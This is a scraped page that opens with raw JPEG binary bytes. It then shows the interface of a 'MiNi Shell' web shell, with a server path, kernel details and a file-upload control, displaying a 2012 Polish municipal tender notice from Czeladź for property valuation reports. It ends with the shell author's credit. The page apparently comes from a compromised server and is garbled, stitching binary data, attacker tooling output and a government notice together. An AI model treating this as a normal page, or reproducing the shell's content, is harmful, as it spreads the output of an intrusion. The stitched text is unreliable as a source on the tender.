JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120321/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120321/87402-N-2012.html

<p class="kh_header"><b>Czeladź: Wykonanie operatów szacunkowych  wyceny wartości gruntów na terenie miasta Czeladź w 2012 roku.</b><br>
<b>Numer ogłoszenia: 87402 - 2012; data zamieszczenia: 21.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czeladź reprezentowana przez Burmistrza , ul. Katowicka 45, 41-250 Czeladź, woj. śląskie, tel. 032 7637923, faks 032 7633694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czeladz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie operatów szacunkowych  wyceny wartości gruntów na terenie miasta Czeladź w 2012 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie operatów szacunkowych wyceny wartości gruntów na terenie miasta Czeladź w 2012 roku.

Zadanie A
CPV  70332000-7 -usługi w zakresie nieruchomości innych niż mieszkalne.
Wykonanie operatów szacunkowych wyceny wartości gruntów komunalnych przeznaczonych do sprzedaży, zamiany, oddania w użytkowanie wieczyste, do sprzedaży prawa użytkowania wieczystego, aktualizacji opłat rocznych za użytkowanie wieczyste, przekształcenia użytkowania wieczystego w prawo własności, ustanowienia prawa służebności, sporządzenie opinii o wartości nieruchomości  oraz opłaty adiacenckiej 
w 2012 r.

Charakterystyka przedmiotu zamówienia:
Realizacja zamówienia polega na wykonaniu n/w operatów szacunkowych:
  1.  21  operatów szacunkowych wyceny wartości gruntu pojedynczej działki;
  2.  12   operatów szacunkowych wyceny wartości gruntu dla działki przyległej;
 3. wykonanie operatu szacunkowego wyceny wartości gruntów do aktualizacji opłat rocznych za użytkowanie wieczyste:
             - wykonanie  operatów dla  5 działek pojedynczych wraz z ceną jednostkową  działki przyległej - łącznie 123  działki przyległe;           
       4.   45 operatów szacunkowych wyceny wartości gruntu ustalającego opłatę za przekształcenie użytkowania wieczystego w prawo własności;
       5.  16 operatów szacunkowych wyceny wartości gruntu dla ustanowienia prawa służebności;
       6.  11 operatów szacunkowych wyceny wartości gruntu ustalającego opłatę adiacencką z tytułu scaleń i podziałów lub budowy urządzeń infrastruktury;
        7. sporządzenie 11 opinii o wartości nieruchomości związanych z ustaleniem opłaty adiacenckiej z tytułu podziałów;
       8.   sporządzenie 3 opinii o wartości nieruchomości.

Zadanie B
CPV  70331000-0  - usługi nieruchomości mieszkalnych.
Wykonanie operatów szacunkowych wyceny wartości komunalnych lokali mieszkalnych i innego składnika budowlanego, sporządzanie opinii o wartości nieruchomości w 2012 r.

Charakterystyka przedmiotu zamówienia:
Realizacja zamówienia polega na wykonaniu n/w operatów szacunkowych:
1. Wykonanie operatu szacunkowego wyceny wartości lokalu mieszkalnego łącznie
    z inwentaryzacją i rzutami kondygnacji lokalu i pomieszczeń przynależnych oraz
    działki gruntu, na której posadowiony jest budynek, w którym znajduje się
    przedmiotowy lokal          -                        67  operatów

2.  Wykonanie operatu szacunkowego wyceny wartości obiektów budowlanych łącznie
     z inwentaryzacją i rzutami kondygnacji oraz działki gruntu, na której posadowiony
     jest budynek:
     a). o kubaturze do 1000 m3                    -     5  operatów
     b). o kubaturze od 1001-2000 m3            -    2  operaty
     c). o kubaturze od 2001- 8000m3            -    1  operat
     
3. Wykonanie operatu szacunkowego wyceny wartości małych obiektów budowlanych (ogrodzenia, garaże, budynki gospodarcze, portiernie itp.) -  4  operaty

4. Sporządzenie opinii o wartości nieruchomości, na której posadowiony jest składnik budowlany:
    a). o kubaturze do 1000 m3                                                          - 1  opinia
    b). o kubaturze od 1001-2000 m3                                                  - 1  opinie
    c). o kubaturze od 2001 m3 - 8000 m3                                           - 3  opinie

Zadanie C
CPV  70332100-8  - usługi zarządzania gruntami.
Wykonanie operatów szacunkowych określających wzrost wartości nieruchomości w związku z uchwaleniem lub zmianą planu miejscowego, w celu ustalenia jednorazowej opłaty, o której mowa w art. 36 ust.4 ustawy o planowaniu i zagospodarowaniu przestrzennym w 2012 r.   
Charakterystyka przedmiotu zamówienia:
Realizacja zamówienia polega na wykonaniu następujących operatów szacunkowych:
1.  3 operatów dla jednej funkcji w planie miejscowym;
2 . 2 operatów dla dwóch funkcji w planie miejscowym;
3.  1 operat dla wielu funkcji w planie miejscowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.33.20.00-7, 70.33.10.00-0, 70.33.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz wykazu wykonanych usług, który zawiera co najmniej 2 usługi na wycenę nieruchomości o wartości brutto nie mniejszej niż: 
a) dla Zadania A: 36.000,-zł.  B) dla Zadania B: 40.000,-zł. c). dla Zadania C: 2.500,-zł. 
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej 2 usługi na wycenę wartości nieruchomości o wartości brutto nie mniejszej niż:
     a) dla Zadania A:        36.000,-zł.
     b) dla Zadania B:        40.000,-zł.
     c) dla Zadania C:          2.500,-zł.
W przypadku składania oferty na więcej niż jedno zadanie Wykonawcę obowiązuje wykaz wykonania usług dla zadania o większej wartości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnych za świadczenie usług, którymi Wykonawca dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu niniejszego zamówienia oraz oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia.
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że będzie dysponował co najmniej 1 osobą posiadającą uprawnienia do wyceny nieruchomości jako rzeczoznawca majątkowy, zgodnie z obowiązującymi w tym zakresie przepisami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy,
2. Pełnomocnictwo, określające jego zakres w przypadku sporządzania oferty przez osobę (osoby) inne niż uprawnione do reprezentowania Wykonawcy (zgodnie z odpisem z właściwego rejestru),
3. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie, w przypadku wspólnego ubiegania się o udzielenie zamówienia,
4. Jeżeli zostanie wybrana oferta Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia, Zamawiający będzie żądać przed zawarciem umowy o udzielenie zamówienia, umowy regulującej współpracę Wykonawców,
5. Jeżeli zostanie wybrana oferta osoby (osób) fizycznej prowadzącej działalność gospodarczą, Zamawiający będzie żądać przed zawarciem umowy o udzielenie zamówienia, przedstawienia aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, względnie oświadczenia o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość dokonania zmiany postanowień zawartej umowy w formie pisemnego aneksu w następujących przypadkach: 
-w przypadku zapotrzebowania Zamawiającego na operaty, o których mowa w § 2, w mniejszej ilości niż to określono w umowie, strony mogą dokonać zmiany ich  ilości poprzez zwiększenie jednej z kategorii wycen, przy jednoczesnym zmniejszeniu innej kategorii, przy  czym przesunięcia można dokonać w ramach łącznej ceny zlecenia przysługującego Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czeladz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Czeladź,41-250 Czeladź,ul. Katowicka 45 -Wydział Gospodarki Nieruchomościami i Nadzoru Właścicielskiego,pokój nr 202,tel. 32/76 37 954;fax 32 76 33 694,e-mail nieruchomości@um.czeladz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2012 godzina 09:00, miejsce: Kancelaria Urzędu Miasta Czeladź, ul. Katowicka 45, pokój nr 118.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE A. WYKONANIE OPERATÓW SZACUNKOWYCH WYCENY WARTOŚCI GRUNTÓW KOMUNALNYCH PRZEZNACZONYCH DO SPRZEDAŻY, ZAMIANY, ODDANIA W UŻYTKOWANIE WIECZYSTE, DO SPRZEDAŻY PRAWA UŻYTKOWANIA WIECZYSTEGO, AKTUALIZACJI OPŁAT ROCZNYCH ZA UŻYTKOWANIE WIECZYSTE, PRZEKSZTAŁCENIE UŻYTKOWANIA WIECZYSTEGO W PRAWO WŁASNOŚCI, USTANOWIENIA PRAWA SŁUŻEBNOŚCI, SPORZĄDZANIE OPINII O WARTOŚCI NIERUCHOMOŚCI ORAZ OPŁATY ADIACENCKIEJ W 2012 R..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zamówienia polega na wykonaniu n/w operatów szacunkowych:
1.  21  operatów szacunkowych wyceny wartości gruntu pojedynczej działki;
2.  12   operatów szacunkowych wyceny wartości gruntu dla działki przyległej;
3. wykonanie operatu szacunkowego wyceny wartości gruntów do aktualizacji opłat rocznych za użytkowanie wieczyste:
    - wykonanie  operatów dla  5 działek pojedynczych wraz z ceną jednostkową  działki przyległej - łącznie 123  działki przyległe;           
4.   45 operatów szacunkowych wyceny wartości gruntu ustalającego opłatę za przekształcenie użytkowania wieczystego w prawo własności;
5.  16 operatów szacunkowych wyceny wartości gruntu dla ustanowienia prawa służebności;
6.  11 operatów szacunkowych wyceny wartości gruntu ustalającego opłatę adiacencką z tytułu scaleń i podziałów lub budowy urządzeń infrastruktury;
7. sporządzenie 11 opinii o wartości nieruchomości związanych z ustaleniem opłaty adiacenckiej z tytułu podziałów;
8. sporządzenie 3 opinii o wartości nieruchomości.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.33.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE B. WYKONANIE OPERATÓW SZACUNKOWYCH WYCENY WARTOŚCI KOMUNALNYCH LOKALI MIESZKALNYCH I INNEGO SKŁADNIKA BUDOWLANEGO, SPORZĄDZANIE OPINII O WARTOŚCI NIERUCHOMOŚCI W 2012 R.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zamówienia polega na wykonaniu n/w operatów szacunkowych:
1. Wykonanie operatu szacunkowego wyceny wartości lokalu mieszkalnego łącznie
    z inwentaryzacją i rzutami kondygnacji lokalu i pomieszczeń przynależnych oraz
    działki gruntu, na której posadowiony jest budynek, w którym znajduje się
    przedmiotowy lokal          -                        67  operatów

2.  Wykonanie operatu szacunkowego wyceny wartości obiektów budowlanych łącznie
     z inwentaryzacją i rzutami kondygnacji oraz działki gruntu, na której posadowiony
     jest budynek:
     a). o kubaturze do 1000 m3                    -     5  operatów
     b). o kubaturze od 1001-2000 m3            -    2  operaty
     c). o kubaturze od 2001- 8000m3            -    1  operat
     
3. Wykonanie operatu szacunkowego wyceny wartości małych obiektów budowlanych (ogrodzenia, garaże, budynki gospodarcze, portiernie itp.)                               -   4  operaty

4. Sporządzenie opinii o wartości nieruchomości, na której posadowiony jest składnik budowlany:
    a). o kubaturze do 1000 m3                                                           - 1  opinia
    b). o kubaturze od 1001-2000 m3                                                   - 1  opinie
    c). o kubaturze od 2001 m3 - - 8000 m3                                          - 3  opinie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.33.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE C. WYKONANIE OPERATÓW SZACUNKOWYCH OKREŚLAJĄCYCH WZROST WARTOŚCI NIERUCHOMOŚCI W ZWIĄZKU Z UCHWALENIEM LUB ZMIANĄ PLANU  MIEJSCOWEGO, W CELU USTALENIA JEDNORAZOWEJ OPŁATY, O KTÓREJ MOWA W ART.36 UST.4 USTAWY O PLANOWANIU I ZAGOSPODAROWANIU PRZESTRZENNYM W 2012 R..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zamówienia polega na wykonaniu następujących operatów szacunkowych:
1. 3 operatów dla jednej funkcji w planie miejscowym;
2. 2 operatów dla dwóch funkcji w planie miejscowym;
3. 1 operat dla wielu funkcji w planie miejscowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.33.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com